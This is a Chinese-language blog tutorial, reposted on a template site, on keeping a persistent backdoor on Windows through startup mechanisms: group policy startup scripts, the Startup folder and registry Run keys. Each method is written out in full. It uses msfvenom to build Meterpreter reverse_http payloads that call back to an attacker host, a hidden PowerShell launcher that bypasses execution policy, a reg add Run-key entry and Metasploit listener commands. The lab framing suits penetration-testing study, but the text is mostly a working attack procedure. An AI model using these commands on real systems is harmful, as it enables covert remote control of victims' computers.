操作系统权限维持(三)之Windows系统-启动项维持后门

这篇具有很好参考价值的文章主要介绍了操作系统权限维持(三)之Windows系统-启动项维持后门。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门

启动项维持后门

启动项

启动项,操作系统在启动的时候,自动加载了很多程序。会在前台或者后台运行,进程表中出现了很多的进程。也许有病毒或木马在自启动行列。

添加启动项的方式:
1、组策略
2、启动文件夹
3、注册表

组策略

可以通过利用组策略开机启动脚本

1、在运行框中输入 “gpedit.msc ”,打开组策略

操作系统权限维持(三)之Windows系统-启动项维持后门

2、在【计算机配置】->【在Windows设置】->【脚本(启动/关机)】双击【启动】就可以进行设置

操作系统权限维持(三)之Windows系统-启动项维持后门

选择在这里要添加的脚本,当Windows机器系统每次重启之后,就会去运行在这里的脚本文件

3、选择要添加的脚本或者PowerShell

机器名 IP
Kali 192.168.52.130
Win10 192.168.52.131

用msf生成一个powershell的木马

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

操作系统权限维持(三)之Windows系统-启动项维持后门

上传木马文件到目标机器上

创建一个1.bat脚本,并且添加到组策略【脚本】中

操作系统权限维持(三)之Windows系统-启动项维持后门

bat脚本内容如下:

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit

kali运行msf进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

操作系统权限维持(三)之Windows系统-启动项维持后门

重启Win10机器,win10机器上线

操作系统权限维持(三)之Windows系统-启动项维持后门

启动文件夹

启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动

启动文件夹:

C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff

生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

操作系统权限维持(三)之Windows系统-启动项维持后门

我们将我们要运行的恶意脚本上传到目标服务器上的启动项文件夹下

操作系统权限维持(三)之Windows系统-启动项维持后门

kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

操作系统权限维持(三)之Windows系统-启动项维持后门

Win10机器重启,靶机上线

操作系统权限维持(三)之Windows系统-启动项维持后门

注册表

注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息

打开注册表

win+r输入regedit

操作系统权限维持(三)之Windows系统-启动项维持后门

以下的注册表路径都是注册表的启动项

# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

我们拿其中一个做为列子

操作系统权限维持(三)之Windows系统-启动项维持后门

msf生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

操作系统权限维持(三)之Windows系统-启动项维持后门
将木马文件上传至目标服务器

使用reg add 命令进行添加

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

操作系统权限维持(三)之Windows系统-启动项维持后门
kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

操作系统权限维持(三)之Windows系统-启动项维持后门

重启Win10机器,靶机上线

操作系统权限维持(三)之Windows系统-启动项维持后门文章来源地址https://www.toymoban.com/news/detail-408323.html

到了这里,关于操作系统权限维持(三)之Windows系统-启动项维持后门的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权

    2024年02月14日
    浏览(36)
  • windows操作系统(文件命名、文件属性、文件系统、权限、DOS命令行)

    0x01 引言 windows是当前用户使用最多的办公系统,本篇文章对windos系统文件的命名规则、文件属性、文件系统格式、windows权限、DOS命令行内容做了梳理总结,帮助大家一起了解windows系统。 0x02 Windows文件的命名规则。 Windows的文件命名规则如下: 文件名不能超过260个字符,文件

    2024年01月24日
    浏览(44)
  • win11启动“适用于Linux的windows的子系统“多次无法打开,重启电脑时总是撤销操作的可能解决方法

    【若本文对您有用请让作者知晓( •̀ ω •́ )y ,如若有疑问可于评论区留言】  目录 前言: 我的问题: 解决方法: 以下是一些具体情况、可能解决方法及原理 避免VMware和WSL的冲突 避免VMware和Hyper-V的冲突 禁用“Accelerate 3D graphics”选项 禁用步骤 卸载VMware 如果卸载完后还

    2024年02月20日
    浏览(67)
  • Windows权限维持--创建隐藏账户(影子账户)

    影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持。 1、创建

    2024年02月12日
    浏览(28)
  • windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey

      在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行

    2024年02月12日
    浏览(38)
  • 7-Linux操作系统 权限管理

    一、权限介绍 在Linux中分别有 读、写、执行 权限: 读权限:   对于文件夹来说,读权限影响用户是否能够列出目录结构   对于文件来说,读权限影响用户是否可以查看文件内容 写权限:   对文件夹来说,写权限影响用户是否可以在文件夹下“创建/删除/复制到/移动

    2024年02月08日
    浏览(46)
  • Linux操作系统下的权限设置

    Linux操作系统是一个多用户的操作系统,可以同时存在多个用户去访问我们的设备;在同一台Linux设备下,当我们不希望我们的文件被其它用户访问时,我们可以为其设置相应的权限~ 在开始介绍今天的内容之前,我们先一起来思考一个问题:  作为用户的我们,在访问操作系

    2024年02月04日
    浏览(73)
  • 【Linux系统编程】第九弹---权限管理操作(下)

      ✨ 个人主页:   熬夜学编程的小林 💗 系列专栏:   【C语言详解】   【数据结构详解】 【C++详解】 【Linux系统编程】 目录 1、目录权限 2、粘滞位 总结 首先提出一个问题,删除一个文件需要什么权限呢??? 回答这个问题之前我们先通过命令来看看现象。 通过上面的

    2024年04月28日
    浏览(46)
  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包